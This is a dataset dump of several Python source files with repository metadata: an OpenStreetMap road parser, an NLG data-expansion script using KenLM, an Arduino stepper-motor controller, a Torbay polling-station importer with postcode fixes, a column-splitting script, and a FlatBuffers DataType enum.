hexsha string | size int64 | ext string | lang string | max_stars_repo_path string | max_stars_repo_name string | max_stars_repo_head_hexsha string | max_stars_repo_licenses list | max_stars_count int64 | max_stars_repo_stars_event_min_datetime string | max_stars_repo_stars_event_max_datetime string | max_issues_repo_path string | max_issues_repo_name string | max_issues_repo_head_hexsha string | max_issues_repo_licenses list | max_issues_count int64 | max_issues_repo_issues_event_min_datetime string | max_issues_repo_issues_event_max_datetime string | max_forks_repo_path string | max_forks_repo_name string | max_forks_repo_head_hexsha string | max_forks_repo_licenses list | max_forks_count int64 | max_forks_repo_forks_event_min_datetime string | max_forks_repo_forks_event_max_datetime string | content string | avg_line_length float64 | max_line_length int64 | alphanum_fraction float64 | qsc_code_num_words_quality_signal int64 | qsc_code_num_chars_quality_signal float64 | qsc_code_mean_word_length_quality_signal float64 | qsc_code_frac_words_unique_quality_signal float64 | qsc_code_frac_chars_top_2grams_quality_signal float64 | qsc_code_frac_chars_top_3grams_quality_signal float64 | qsc_code_frac_chars_top_4grams_quality_signal float64 | qsc_code_frac_chars_dupe_5grams_quality_signal float64 | qsc_code_frac_chars_dupe_6grams_quality_signal float64 | qsc_code_frac_chars_dupe_7grams_quality_signal float64 | qsc_code_frac_chars_dupe_8grams_quality_signal float64 | qsc_code_frac_chars_dupe_9grams_quality_signal float64 | qsc_code_frac_chars_dupe_10grams_quality_signal float64 | qsc_code_frac_chars_replacement_symbols_quality_signal float64 | qsc_code_frac_chars_digital_quality_signal float64 | qsc_code_frac_chars_whitespace_quality_signal float64 | qsc_code_size_file_byte_quality_signal float64 | qsc_code_num_lines_quality_signal float64 | qsc_code_num_chars_line_max_quality_signal float64 | qsc_code_num_chars_line_mean_quality_signal float64 | qsc_code_frac_chars_alphabet_quality_signal float64 | qsc_code_frac_chars_comments_quality_signal float64 | qsc_code_cate_xml_start_quality_signal float64 | qsc_code_frac_lines_dupe_lines_quality_signal float64 | qsc_code_cate_autogen_quality_signal float64 | qsc_code_frac_lines_long_string_quality_signal float64 | qsc_code_frac_chars_string_length_quality_signal float64 | qsc_code_frac_chars_long_word_length_quality_signal float64 | qsc_code_frac_lines_string_concat_quality_signal float64 | qsc_code_cate_encoded_data_quality_signal float64 | qsc_code_frac_chars_hex_words_quality_signal float64 | qsc_code_frac_lines_prompt_comments_quality_signal float64 | qsc_code_frac_lines_assert_quality_signal float64 | qsc_codepython_cate_ast_quality_signal float64 | qsc_codepython_frac_lines_func_ratio_quality_signal float64 | qsc_codepython_cate_var_zero_quality_signal bool | qsc_codepython_frac_lines_pass_quality_signal float64 | qsc_codepython_frac_lines_import_quality_signal float64 | qsc_codepython_frac_lines_simplefunc_quality_signal float64 | qsc_codepython_score_lines_no_logic_quality_signal float64 | qsc_codepython_frac_lines_print_quality_signal float64 | qsc_code_num_words int64 | qsc_code_num_chars int64 | qsc_code_mean_word_length int64 | qsc_code_frac_words_unique null | qsc_code_frac_chars_top_2grams int64 | qsc_code_frac_chars_top_3grams int64 | qsc_code_frac_chars_top_4grams int64 | qsc_code_frac_chars_dupe_5grams int64 | qsc_code_frac_chars_dupe_6grams int64 | qsc_code_frac_chars_dupe_7grams int64 | qsc_code_frac_chars_dupe_8grams int64 | qsc_code_frac_chars_dupe_9grams int64 | qsc_code_frac_chars_dupe_10grams int64 | qsc_code_frac_chars_replacement_symbols int64 | qsc_code_frac_chars_digital int64 | qsc_code_frac_chars_whitespace int64 | qsc_code_size_file_byte int64 | qsc_code_num_lines int64 | qsc_code_num_chars_line_max int64 | qsc_code_num_chars_line_mean int64 | qsc_code_frac_chars_alphabet int64 | qsc_code_frac_chars_comments int64 | qsc_code_cate_xml_start int64 | qsc_code_frac_lines_dupe_lines int64 | qsc_code_cate_autogen int64 | qsc_code_frac_lines_long_string int64 | qsc_code_frac_chars_string_length int64 | qsc_code_frac_chars_long_word_length int64 | qsc_code_frac_lines_string_concat null | qsc_code_cate_encoded_data int64 | qsc_code_frac_chars_hex_words int64 | qsc_code_frac_lines_prompt_comments int64 | qsc_code_frac_lines_assert int64 | qsc_codepython_cate_ast int64 | qsc_codepython_frac_lines_func_ratio int64 | qsc_codepython_cate_var_zero int64 | qsc_codepython_frac_lines_pass int64 | qsc_codepython_frac_lines_import int64 | qsc_codepython_frac_lines_simplefunc int64 | qsc_codepython_score_lines_no_logic int64 | qsc_codepython_frac_lines_print int64 | effective string | hits int64 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
47170ca3654fffbe8da2a35f88340beab3b11a2b | 3,333 | py | Python | osm/parser.py | ChenZhongPu/osmRoad | 5c4ce5e7476b6f35c2917efa835c4f1a0f308ebf | [
"MIT"
] | 1 | 2019-05-02T21:33:05.000Z | 2019-05-02T21:33:05.000Z | osm/parser.py | ChenZhongPu/osmRoad | 5c4ce5e7476b6f35c2917efa835c4f1a0f308ebf | [
"MIT"
] | 1 | 2019-05-02T22:55:43.000Z | 2019-05-02T22:55:43.000Z | osm/parser.py | ChenZhongPu/osmRoad | 5c4ce5e7476b6f35c2917efa835c4f1a0f308ebf | [
"MIT"
] | 3 | 2019-05-02T22:37:42.000Z | 2021-04-24T05:59:32.000Z | # --------------------------------------------------------------------
# The osmRoad is
#
# Copyright (c) 2018 by Zhongpu Chen (chenloveit@gmail.com)
#
# By obtaining, using, and/or copying this software and/or its
# associated documentation, you agree that you have read, understood,
# and will comply with the following terms and conditions:
#
# Permission to use, copy, modify, and distribute this software and
# its associated documentation for any purpose and without fee is
# hereby granted, provided that the above copyright notice appears in
# all copies, and that both that copyright notice and this permission
# notice appear in supporting documentation, and that the name of
# Secret Labs AB or the author not be used in advertising or publicity
# pertaining to distribution of the software without specific, written
# prior permission.
#
# SECRET LABS AB AND THE AUTHOR DISCLAIMS ALL WARRANTIES WITH REGARD
# TO THIS SOFTWARE, INCLUDING ALL IMPLIED WARRANTIES OF MERCHANT-
# ABILITY AND FITNESS. IN NO EVENT SHALL SECRET LABS AB OR THE AUTHOR
# BE LIABLE FOR ANY SPECIAL, INDIRECT OR CONSEQUENTIAL DAMAGES OR ANY
# DAMAGES WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS,
# WHETHER IN AN ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS
# ACTION, ARISING OUT OF OR IN CONNECTION WITH THE USE OR PERFORMANCE
# OF THIS SOFTWARE.
# --------------------------------------------------------------------
import xml.etree.cElementTree as et
def load_osm(filename):
root = et.parse(filename).getroot()
return root
def load_parse_osm(filename):
root = load_osm(filename)
return {'bound': parse_bound(root), 'nodes': parse_node(root), 'ways': parse_way(root)}
def load_parse_osmxy(filename):
root = load_osm(filename)
return {'bound': parse_bound(root), 'nodes': parse_nodexy(root), 'ways': parse_way(root)}
def parse_bound(root):
bound = root.findall('bounds')[0]
xmin = float(bound.attrib['minlon'])
xmax = float(bound.attrib['maxlon'])
ymin = float(bound.attrib['minlat'])
ymax = float(bound.attrib['maxlat'])
return {'xmin': xmin, 'xmax': xmax, 'ymin': ymin, 'ymax': ymax}
def parse_nodexy(root):
nodes = {}
for node in root.findall('node'):
nodes[int(node.attrib['id'])] = (float(node.attrib['lon']), float(node.attrib['lat']))
return nodes
def parse_node(root):
nodes = {}
idx = 0
for node in root.findall('node'):
nodes[int(node.attrib['id'])] = idx
idx += 1
return nodes
def parse_way(root):
# refer to https://wiki.openstreetmap.org/wiki/Key:highway
road_vals = ['motorway', 'motorway_link', 'trunk', 'trunk_link',
'primary', 'primary_link', 'secondary', 'secondary_link',
'tertiary', 'road', 'residential', 'living_street',
'service', 'services', 'motorway_junction']
ways = []
for way in root.findall('way'):
nodes = []
for node in way.findall('nd'):
nodes.append(int(node.attrib['ref']))
tags = {}
for tag in way.findall('tag'):
tags[tag.attrib['k']] = tag.attrib['v']
# only highway is kept
if 'highway' not in tags:
continue
if tags['highway'] not in road_vals:
continue
ways.append((nodes, tags))
return ways
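# Usage sketch (illustrative only; 'map.osm' stands for a hypothetical
# extract exported from openstreetmap.org, not a file shipped with this
# module):
def _example_usage(filename='map.osm'):
    """Parse an OSM extract and report its bounding box and road count."""
    parsed = load_parse_osm(filename)
    bound = parsed['bound']  # {'xmin': ..., 'xmax': ..., 'ymin': ..., 'ymax': ...}
    ways = parsed['ways']    # list of (node_ids, tags) per kept highway
    return bound, len(ways)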
| 35.457447 | 94 | 0.643264 | 437 | 3,333 | 4.84897 | 0.407323 | 0.023596 | 0.030203 | 0.013214 | 0.143464 | 0.143464 | 0.100047 | 0.100047 | 0.100047 | 0.100047 | 0 | 0.002644 | 0.205521 | 3,333 | 93 | 95 | 35.83871 | 0.797583 | 0.432343 | 0 | 0.208333 | 0 | 0 | 0.142397 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.145833 | false | 0 | 0.020833 | 0 | 0.3125 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
4718c7e9cd589624b9835b0bd07e75e39f735f11 | 8,319 | py | Python | cs-restaurant/input/devel/expand.py | stg880631/tgen | 67db94bf3bfc851e673e50b84230ed9f533b2c23 | [
"Apache-2.0"
] | null | null | null | cs-restaurant/input/devel/expand.py | stg880631/tgen | 67db94bf3bfc851e673e50b84230ed9f533b2c23 | [
"Apache-2.0"
] | null | null | null | cs-restaurant/input/devel/expand.py | stg880631/tgen | 67db94bf3bfc851e673e50b84230ed9f533b2c23 | [
"Apache-2.0"
] | null | null | null | #!/usr/bin/env python
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
import re
import sys
import codecs
from argparse import ArgumentParser
from util import load_dais, load_texts, write_das, write_texts, write_toks, DAI
import kenlm
import numpy as np
from delexicalize import Delexicalizer
from tgen.logf import log_info
def da_key(da):
return "&".join([unicode(dai) for dai in sorted(da, key=lambda dai: (dai.slot, dai.value))])
class Expander(object):
SPECIAL_VALUES = [None, '', 'dont_care', 'none', 'yes', 'no',
'yes or no', 'no or yes', 'restaurant']
def __init__(self, args):
# read inputs
self.orig_das = load_dais(args.orig_das)
self.transl_das = load_dais(args.transl_das)
self.transl_texts = load_texts(args.transl_texts)
# run delexicalization, store tokens + lemmas + tags, delex DAs
self.delexicalizer = Delexicalizer(args.slots, args.surface_forms,
args.tagger_model, args.tagger_overrides,
output_format='factors')
log_info("Delexicalizing...")
self.delex_texts = []
self.delex_das = []
vals_to_forms = []
for counter, (da, text) in enumerate(zip(self.transl_das, self.transl_texts)):
delex_text, v2f = self.delexicalizer.delexicalize_text(text, da, counter)
vals_to_forms.extend(v2f)
self.delex_texts.append(delex_text)
self.delex_das.append(self.delexicalizer.delexicalize_da(da))
self.values = self.get_values(vals_to_forms)
log_info("Grouping DAs...")
self.orig_da_positions = self.group_das(self.orig_das, check_delex=True)
self.transl_da_positions = self.group_das(self.delex_das)
self.out_texts = [None] * len(self.orig_das)
self.out_delex_texts = [None] * len(self.orig_das)
self.out_das = [None] * len(self.orig_das)
self.out_delex_das = [None] * len(self.orig_das)
log_info("Loading LM...")
self.lm = kenlm.Model(args.lm)
self.out_texts_file = args.out_texts
self.out_delex_texts_file = args.out_delex_texts
self.out_das_file = args.out_das
self.out_delex_das_file = args.out_delex_das
def expand(self):
log_info("Expanding...")
for da_key, (da, orig_pos) in self.orig_da_positions.iteritems():
if da_key not in self.transl_da_positions:
print >> sys.stderr, "DA key not found: %s" % da_key
print >> sys.stderr, "Original positions: %s" % ", ".join([str(p) for p in orig_pos])
continue
_, transl_pos = self.transl_da_positions[da_key]
self.expand_da(da, orig_pos, transl_pos)
def expand_da(self, da, orig_pos, transl_pos):
# count # of different realizations for the given DA
orig_count = len(orig_pos)
transl_count = len(transl_pos)
assert(orig_count > 0)
assert(transl_count > 0)
assert(transl_count <= orig_count)
# score all realizations by a LM
scores = []
for pos in transl_pos:
scores.append(self.lm.score(" ".join([lemma for _, lemma, _ in self.delex_texts[pos]])))
# normalize scores into a prob dist (~ apply softmax)
max_score = max(scores)
scores = np.array(scores) - max_score
scores = np.exp(scores)
scores /= np.sum(scores)
# save the original stuff into the new positions
for opos_, tpos_ in zip(orig_pos, transl_pos):
self.out_texts[opos_] = self.transl_texts[tpos_]
self.out_delex_texts[opos_] = [tok for tok, _, _ in self.delex_texts[tpos_]]
self.out_das[opos_] = self.transl_das[tpos_]
self.out_delex_das[opos_] = self.delex_das[tpos_]
# sample missing stuff from that distribution
# TODO mark them to be checked
repls = np.random.choice(transl_pos, orig_count - transl_count, p=scores)
for opos_, tpos_ in zip(orig_pos[transl_count:], repls):
relex_text, relex_da = self.relexicalize(self.delex_texts[tpos_],
self.delex_das[tpos_])
self.out_texts[opos_] = relex_text
self.out_delex_texts[opos_] = [tok for tok, _, _ in self.delex_texts[tpos_]]
self.out_das[opos_] = relex_da
self.out_delex_das[opos_] = self.delex_das[tpos_]
def relexicalize(self, text, da):
text = " ".join([tok for tok, _, _ in text])
text = re.sub(r' ([?.,\'])', r'\1', text)
da = [DAI(dai.dat, dai.slot, dai.value) for dai in da] # deep copy
changed = False
for dai in da:
if dai.value in self.SPECIAL_VALUES:
continue
changed = True
# relexicalize DA
form = re.search(r'X-' + dai.slot + r'(/(?:n|adj|adv|v):?(?:[0-9X]|attr|fin)?)?', text).group(1) or ""
# relexicalize text
if len(self.values[dai.slot][form]) == 1:
# TODO enable reinflection?
# TODO restauraci Švejk = n:1
print >> sys.stderr, "Singleton value: %s %s %s" % (dai.slot, form, unicode(self.values[dai.slot][form]))
values = list(self.values[dai.slot][form])
value = np.random.choice(len(values))
value, surface = values[value]
dai.value = value
text = re.sub(r'X-' + dai.slot + r'(/[^ .,;!?]*)?', surface, text)
text = ('!CHECK ' if changed else '') + text
return text, da
def group_das(self, das, check_delex=False):
groups = {}
for cur_pos, da in enumerate(das):
key = da_key(da)
if check_delex:
delex_da = self.delexicalizer.delexicalize_da(da)
delex_key = da_key(delex_da)
if delex_key != key:
print >> sys.stderr, "DA not properly delexicalized: %d - %s" % (cur_pos, key)
da = delex_da
key = delex_key
pos = groups.get(key, (None, []))[1]
pos.append(cur_pos)
groups[key] = (da, pos)
return groups
def get_values(self, vals_to_forms_list):
ret = {}
for slot, value, form, tokens in vals_to_forms_list:
if slot not in ret:
ret[slot] = {}
if form not in ret[slot]:
ret[slot][form] = set()
ret[slot][form].add((value, " ".join(tokens)))
return ret
def write_outputs(self):
log_info("Writing outputs...")
write_texts(self.out_texts_file, self.out_texts)
write_toks(self.out_delex_texts_file, self.out_delex_texts,
capitalize=False, detok=False, lowercase=True)
write_das(self.out_das_file, self.out_das)
write_das(self.out_delex_das_file, self.out_delex_das)
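def _softmax_sketch(scores):
    """Illustrative helper, not part of the original module: the same
    max-shift + exp + normalise trick that expand_da applies to KenLM
    log-scores before sampling replacement realizations."""
    scores = np.array(scores) - max(scores)  # shift for numerical stability
    scores = np.exp(scores)
    return scores / np.sum(scores)  # probability distribution summing to 1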
def main():
ap = ArgumentParser()
ap.add_argument('-l', '--lm', type=str, help='KenLM language model on lowercased, delexicalized,' +
'tokenized texts')
ap.add_argument('-s', '--slots', type=str, help='List of slots to delexicalize')
ap.add_argument('-f', '--surface-forms', type=str, help='Input file with surface forms for slot values')
ap.add_argument('-t', '--tagger-model', type=str, help='Path to Morphodita tagger model')
ap.add_argument('-o', '--tagger-overrides', type=str, help='Path to a JSON file with tagger overrides')
ap.add_argument('orig_das', type=str, help='Input delexicalized original DAs')
ap.add_argument('transl_das', type=str, help='Input lexicalized translated DAs')
ap.add_argument('transl_texts', type=str, help='Input lexicalized translated texts')
ap.add_argument('out_texts', type=str, help='Output lexicalized texts')
ap.add_argument('out_delex_texts', type=str, help='Output delexicalized texts')
ap.add_argument('out_das', type=str, help='Output lexicalized DAs')
ap.add_argument('out_delex_das', type=str, help='Output delexicalized DAs')
args = ap.parse_args()
np.random.seed(1206)
ex = Expander(args)
ex.expand()
ex.write_outputs()
if __name__ == '__main__':
main()
| 40.383495 | 121 | 0.60464 | 1,109 | 8,319 | 4.306583 | 0.201082 | 0.035176 | 0.030151 | 0.021357 | 0.252513 | 0.114531 | 0.073492 | 0.073492 | 0.041457 | 0.026801 | 0 | 0.002649 | 0.274071 | 8,319 | 205 | 122 | 40.580488 | 0.78821 | 0.056137 | 0 | 0.039474 | 0 | 0.019737 | 0.111026 | 0.005232 | 0 | 0 | 0 | 0.004878 | 0.019737 | 1 | 0.059211 | false | 0 | 0.065789 | 0.006579 | 0.164474 | 0.026316 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
471ba427f7183a39af603bd2c7e5e3442783239a | 3,908 | py | Python | rpi-config/scripts/arduinoMotor.py | DiamondLightSource/rpi-config | 617f5e176c0621e3ea1b567e9586e96ba0f8b5db | [
"Apache-2.0"
] | 4 | 2016-08-23T12:13:21.000Z | 2018-08-22T12:55:55.000Z | rpi-config/scripts/arduinoMotor.py | DiamondLightSource/rpi-config | 617f5e176c0621e3ea1b567e9586e96ba0f8b5db | [
"Apache-2.0"
] | null | null | null | rpi-config/scripts/arduinoMotor.py | DiamondLightSource/rpi-config | 617f5e176c0621e3ea1b567e9586e96ba0f8b5db | [
"Apache-2.0"
] | 2 | 2016-09-15T19:17:30.000Z | 2018-03-06T06:34:13.000Z | from gda.device.scannable import PseudoDevice
from arduinoScannable import arduinoScannable
import time
from org.slf4j import LoggerFactory
logger = LoggerFactory.getLogger(__name__ + '.py')
class arduinoMotor(PseudoDevice):
def __init__(self, name, stepsPerRotation, motorPin1, motorPin2, motorPin3, motorPin4):
self.setName(name) # required
self.setInputNames(["Angle (Degrees)"]) # required
self.setExtraNames(["Position (Steps)"]) # required
self.setOutputFormat(["%s", "%s"]) # required
self.motorPin1 = motorPin1
self.motorPin2 = motorPin2
self.motorPin3 = motorPin3
self.motorPin4 = motorPin4
self.stepAngleConversion = 360.0/stepsPerRotation
self.currentPhase = 0
self.busyTest = False
def getPosition(self):
return [self.stepsToDegrees(self.currentPhase), self.currentPhase]
def stepsToDegrees(self, valSteps):
logger.debug("Steps: "+str(valSteps))
if valSteps != 0:
valDegrees = valSteps * self.stepAngleConversion
return valDegrees
else:
return 0
def degreesToSteps(self, valDegrees):
logger.debug("Degrees: "+str(valDegrees))
if valDegrees != 0:
valSteps = valDegrees / self.stepAngleConversion
return valSteps
else:
return 0
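    # Worked example (hypothetical motor): with stepsPerRotation=4096,
    # stepAngleConversion = 360/4096 ~= 0.0879 degrees per step, so
    # degreesToSteps(90) ~= 1024 steps and stepsToDegrees(1024) ~= 90.0.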
def asynchronousMoveTo(self,newPosition):
newPosition = self.degreesToSteps(newPosition)
logger.trace("New Position: "+str(newPosition))
self.busyTest = True
#targetPhase = self.currentPhase + newPosition ##relative positioning
targetPhase = newPosition
if targetPhase%1 < 0.5:
targetPhase = int(targetPhase)
else:
targetPhase = int(targetPhase) + 1
while self.currentPhase != targetPhase:
logger.trace("Current Phase: "+str(self.currentPhase))
logger.trace("Target Phase: "+str(targetPhase))
if targetPhase < self.currentPhase:
self.currentPhase -= 1
elif targetPhase > self.currentPhase:
self.currentPhase += 1
phaseMod = self.currentPhase%8
logger.trace("Phase Mod: " + str(phaseMod))
if (phaseMod == 1):
self.motorPin1.asynchronousMoveTo(1)
self.motorPin2.asynchronousMoveTo(0)
self.motorPin4.asynchronousMoveTo(0)
elif (phaseMod == 2):
self.motorPin1.asynchronousMoveTo(1)
self.motorPin2.asynchronousMoveTo(1)
elif (phaseMod == 3):
self.motorPin1.asynchronousMoveTo(0)
self.motorPin2.asynchronousMoveTo(1)
self.motorPin3.asynchronousMoveTo(0)
elif (phaseMod == 4):
self.motorPin2.asynchronousMoveTo(1)
self.motorPin3.asynchronousMoveTo(1)
elif (phaseMod == 5):
self.motorPin2.asynchronousMoveTo(0)
self.motorPin3.asynchronousMoveTo(1)
self.motorPin4.asynchronousMoveTo(0)
elif (phaseMod == 6):
self.motorPin3.asynchronousMoveTo(1)
self.motorPin4.asynchronousMoveTo(1)
elif (phaseMod == 7):
self.motorPin1.asynchronousMoveTo(0)
self.motorPin3.asynchronousMoveTo(0)
self.motorPin4.asynchronousMoveTo(1)
elif (phaseMod == 0):
self.motorPin1.asynchronousMoveTo(1)
self.motorPin4.asynchronousMoveTo(1)
else:
pass
time.sleep(0.1)
self.busyTest = False
def isBusy(self):
return self.busyTest | 39.877551 | 91 | 0.575486 | 326 | 3,908 | 6.874233 | 0.239264 | 0.10174 | 0.071843 | 0.055332 | 0.344935 | 0.281571 | 0.168675 | 0 | 0 | 0 | 0 | 0.030478 | 0.336745 | 3,908 | 98 | 92 | 39.877551 | 0.834105 | 0.026612 | 0 | 0.325581 | 0 | 0 | 0.028444 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.069767 | false | 0.011628 | 0.046512 | 0.023256 | 0.197674 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
471e1e651b0efcca16a531bc8067e597b5c516f6 | 2,986 | py | Python | polling_stations/apps/data_collection/management/commands/import_torbay.py | alexsdutton/UK-Polling-Stations | 01ec234fd4a832694870d5ed9de069a228397f53 | [
"BSD-3-Clause"
] | null | null | null | polling_stations/apps/data_collection/management/commands/import_torbay.py | alexsdutton/UK-Polling-Stations | 01ec234fd4a832694870d5ed9de069a228397f53 | [
"BSD-3-Clause"
] | null | null | null | polling_stations/apps/data_collection/management/commands/import_torbay.py | alexsdutton/UK-Polling-Stations | 01ec234fd4a832694870d5ed9de069a228397f53 | [
"BSD-3-Clause"
] | null | null | null | from data_collection.management.commands import BaseXpressDemocracyClubCsvImporter
class Command(BaseXpressDemocracyClubCsvImporter):
council_id = "E06000027"
addresses_name = "local.2019-05-02/Version 1/Democracy_Club__02May2019tor.tsv"
stations_name = "local.2019-05-02/Version 1/Democracy_Club__02May2019tor.tsv"
elections = ["local.2019-05-02"]
csv_delimiter = "\t"
def station_record_to_dict(self, record):
if record.polling_place_id == "6337":
record = record._replace(polling_place_postcode="TQ5 0BX")
if record.polling_place_id == "6331":
record = record._replace(polling_place_postcode="TQ5 9HW")
return super().station_record_to_dict(record)
def address_record_to_dict(self, record):
rec = super().address_record_to_dict(record)
uprn = record.property_urn.strip().lstrip("0")
if uprn == "679205":
rec["postcode"] = "BS161PF"
rec["accept_suggestion"] = False
if uprn in [
"100041196260", # TQ26AS -> TQ26AP : Millbrook House Hotel, Old Mill Road, Torquay
"200001778568", # TQ14AF -> TQ14AG : 1C Magdalene Rd Rear Of, 17 Upton Road, Torquay
"100040561357", # TQ14LR -> TQ14LH : Flat 2 Westhill Court, 12 Westhill Avenue, Torquay
"100040561358", # TQ14LR -> TQ14LH : Flat 3 Westhill Court, 12 Westhill Avenue, Torquay
"100040559288", # TQ11EJ -> TQ11EG : 2 Apsley House, Torwood Gardens Road, Torquay
"100040559289", # TQ11EJ -> TQ11EG : 3 Apsley House, Torwood Gardens Road, Torquay
"10002989359", # TQ50BX -> TQ50BP : The Hayloft, 26 Milton Street, Brixham
]:
rec["accept_suggestion"] = True
if uprn in [
"100040523809", # TQ26AU -> TQ46AU : Cottage C, 1 Old Mill Road, Torquay
"100041187152", # TQ12EA -> TQ11BN : Cottage 1 Sundial Lodge, Park Hill Road, Torquay
"100041187013", # TQ12EA -> TQ11BN : Mews 8 Sundial Lodge, Park Hill Road, Torquay
"100040534293", # TQ32HW -> TQ32SF : Bottom Flat, 239 Torquay Road, Paignton
"10000012748", # TQ32HT -> TQ50EH : 1 Manor Court, Manor Road, Paignton
"10000012807", # TQ32HT -> TQ50EH : 7 Manor Court, Manor Road, Paignton
"10000012810", # TQ32HT -> TQ50EH : 4 Manor Court, Manor Road, Paignton
"100041195363", # TQ32HT -> TQ25BZ : 9 Manor Court, Manor Road, Paignton
"10000012832", # TQ32HT -> TQ50EH : 5 Manor Court, Manor Road, Paignton
"10000012760", # TQ32HT -> TQ50EH : 2 Manor Court, Manor Road, Paignton
"10000012746", # TQ32HT -> TQ50EH : 3 Manor Court, Manor Road, Paignton
"10000012765", # TQ32HT -> TQ50EH : 6 Manor Court, Manor Road, Paignton
"10000013683", # TQ58AG -> TQ59DJ : Flat 2, 67a Fore Street, Brixham
]:
rec["accept_suggestion"] = False
return rec
| 50.610169 | 100 | 0.630944 | 329 | 2,986 | 5.613982 | 0.462006 | 0.058473 | 0.06497 | 0.082296 | 0.413644 | 0.214402 | 0.10287 | 0.05739 | 0.05739 | 0.05739 | 0 | 0.186758 | 0.266577 | 2,986 | 58 | 101 | 51.482759 | 0.656621 | 0.401206 | 0 | 0.130435 | 0 | 0 | 0.266553 | 0.065648 | 0 | 0 | 0 | 0 | 0 | 1 | 0.043478 | false | 0 | 0.043478 | 0 | 0.26087 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
472180e30875c4ac8339f38fa4c6fde5ae82de74 | 376 | py | Python | nlp100/12.py | walkingmask/expr4-dm-2016 | b62d4c9d57ea8e4efe044fc98e4bdc365e87666d | [
"MIT"
] | null | null | null | nlp100/12.py | walkingmask/expr4-dm-2016 | b62d4c9d57ea8e4efe044fc98e4bdc365e87666d | [
"MIT"
] | null | null | null | nlp100/12.py | walkingmask/expr4-dm-2016 | b62d4c9d57ea8e4efe044fc98e4bdc365e87666d | [
"MIT"
] | null | null | null | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
# 12.py
# 2016/10/11(火)
# walkingmask
# check
# cut -f1 hightemp.txt
# cut -f2 hightemp.txt
col1f = open('col1.txt', 'w')
col2f = open('col2.txt', 'w')
for line in open('hightemp.txt', 'r'):
raw = line.rstrip().replace("\t"," ").split(" ")
col1f.write(raw[0]+"\n")
col2f.write(raw[1]+"\n")
col1f.close()
col2f.close()
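# Equivalent sketch using context managers (illustrative alternative with the
# same output, assuming tab-separated fields without embedded spaces):
# with open('hightemp.txt') as src, \
#         open('col1.txt', 'w') as c1, open('col2.txt', 'w') as c2:
#     for line in src:
#         cols = line.rstrip().split('\t')
#         c1.write(cols[0] + '\n')
#         c2.write(cols[1] + '\n')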
| 17.090909 | 50 | 0.590426 | 60 | 376 | 3.7 | 0.666667 | 0.148649 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.075 | 0.148936 | 376 | 21 | 51 | 17.904762 | 0.61875 | 0.327128 | 0 | 0 | 0 | 0 | 0.159184 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
47223575ffe3dacf450a360bb6f35695e71e393c | 1,115 | py | Python | libnd4j/include/graph/generated/nd4j/graph/DataType.py | nutonchain/Deeplearning | 20f222c1eff95205c6c9c9b666b04402405e4442 | [
"Apache-2.0"
] | 1 | 2018-08-29T05:46:54.000Z | 2018-08-29T05:46:54.000Z | libnd4j/include/graph/generated/nd4j/graph/DataType.py | nutonchain/Deeplearning | 20f222c1eff95205c6c9c9b666b04402405e4442 | [
"Apache-2.0"
] | null | null | null | libnd4j/include/graph/generated/nd4j/graph/DataType.py | nutonchain/Deeplearning | 20f222c1eff95205c6c9c9b666b04402405e4442 | [
"Apache-2.0"
] | 1 | 2020-12-13T22:26:47.000Z | 2020-12-13T22:26:47.000Z | ################################################################################
# Copyright (c) 2015-2018 Skymind, Inc.
#
# This program and the accompanying materials are made available under the
# terms of the Apache License, Version 2.0 which is available at
# https://www.apache.org/licenses/LICENSE-2.0.
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
#
# SPDX-License-Identifier: Apache-2.0
################################################################################
# automatically generated by the FlatBuffers compiler, do not modify
# namespace: graph
class DataType(object):
INHERIT = 0
BOOL = 1
FLOAT8 = 2
HALF = 3
HALF2 = 4
FLOAT = 5
DOUBLE = 6
INT8 = 7
INT16 = 8
INT32 = 9
INT64 = 10
UINT8 = 11
UINT16 = 12
UINT32 = 13
UINT64 = 14
QINT8 = 15
QINT16 = 16
